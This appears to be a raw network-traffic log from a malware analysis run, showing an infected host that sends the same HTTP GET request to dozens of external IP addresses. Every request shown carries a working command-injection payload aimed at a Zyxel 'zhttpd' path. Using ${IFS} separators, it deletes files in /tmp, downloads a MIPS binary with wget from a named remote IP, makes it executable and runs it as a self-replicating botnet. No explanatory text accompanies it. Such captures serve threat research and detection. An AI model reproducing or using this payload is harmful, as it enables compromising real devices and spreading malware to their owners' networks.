                                                Jan 12, 2024 18:16:30.626494884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6269192.168.2.2337616187.255.121.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626559019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6270192.168.2.2353700108.199.30.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626600027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6271192.168.2.2353286219.246.197.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626705885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6272192.168.2.2333920107.71.174.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626713037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6273192.168.2.2350778161.179.31.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626713037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6274192.168.2.2355468159.125.13.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626724958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6275192.168.2.234119050.64.125.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626744032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6276192.168.2.2338676162.67.241.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626784086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6277192.168.2.2353938213.153.253.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626831055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6278192.168.2.2355790160.224.123.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626868963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6279192.168.2.233878444.227.204.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626938105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6280192.168.2.2347836206.193.24.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.626956940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6281192.168.2.234864452.177.143.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627010107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6282192.168.2.2352646205.194.113.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627027988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6283192.168.2.23362524.102.168.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627079010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6284192.168.2.233484870.5.148.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627100945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6285192.168.2.2343118114.234.9.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627154112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6286192.168.2.2347744109.118.125.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627187967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6287192.168.2.234714498.31.217.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627234936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6288192.168.2.2355860110.175.83.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627263069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6289192.168.2.2341430135.48.249.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627312899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6290192.168.2.2357044158.235.155.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627358913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6291192.168.2.2354162163.150.193.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627408028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6292192.168.2.2333566139.30.78.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627470016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6293192.168.2.233983072.255.63.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627499104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6294192.168.2.236061643.66.250.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627548933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6295192.168.2.2339220189.130.16.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627584934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6296192.168.2.235034891.231.237.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627649069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6297192.168.2.2348958105.28.30.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627670050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6298192.168.2.2332900133.69.66.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627698898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6299192.168.2.234853484.101.85.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627732038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6300192.168.2.2341378116.212.162.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627785921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6301192.168.2.2334682103.152.223.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627813101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6302192.168.2.235680291.96.252.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627831936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6303192.168.2.2355502103.37.248.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627866983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6304192.168.2.235948452.1.203.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627898932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6305192.168.2.2351114123.225.157.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627954006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6306192.168.2.235792873.1.118.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.627995014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6307192.168.2.2342630171.44.181.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628025055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6308192.168.2.234995482.10.48.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628086090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6309192.168.2.233957091.38.8.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628119946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6310192.168.2.234132862.237.151.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628154993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6311192.168.2.2344676159.48.139.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628206015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6312192.168.2.234616254.155.175.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628247023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6313192.168.2.2336266213.52.217.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628288984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6314192.168.2.2347288128.62.63.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628319979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6315192.168.2.233531670.14.110.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628376961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6316192.168.2.234092858.132.152.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628413916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6317192.168.2.2342468114.69.200.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628447056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6318192.168.2.233376846.94.34.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628494024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6319192.168.2.235317047.235.55.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628541946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6320192.168.2.2349756141.73.54.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628588915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6321192.168.2.235508814.26.228.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628618956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6322192.168.2.2348728106.113.29.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628668070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6323192.168.2.235767819.173.220.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628707886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6324192.168.2.2342198143.110.157.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628762960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6325192.168.2.2355574195.70.138.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628794909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6326192.168.2.2343640124.59.189.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628835917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6327192.168.2.2348600207.54.89.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628890038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6328192.168.2.2341280207.187.138.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628921986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6329192.168.2.23380461.195.181.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628952980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6330192.168.2.233889862.235.248.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:30.628998995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6331192.168.2.23481901.151.134.122443
                                                TimestampBytes transferredDirectionData
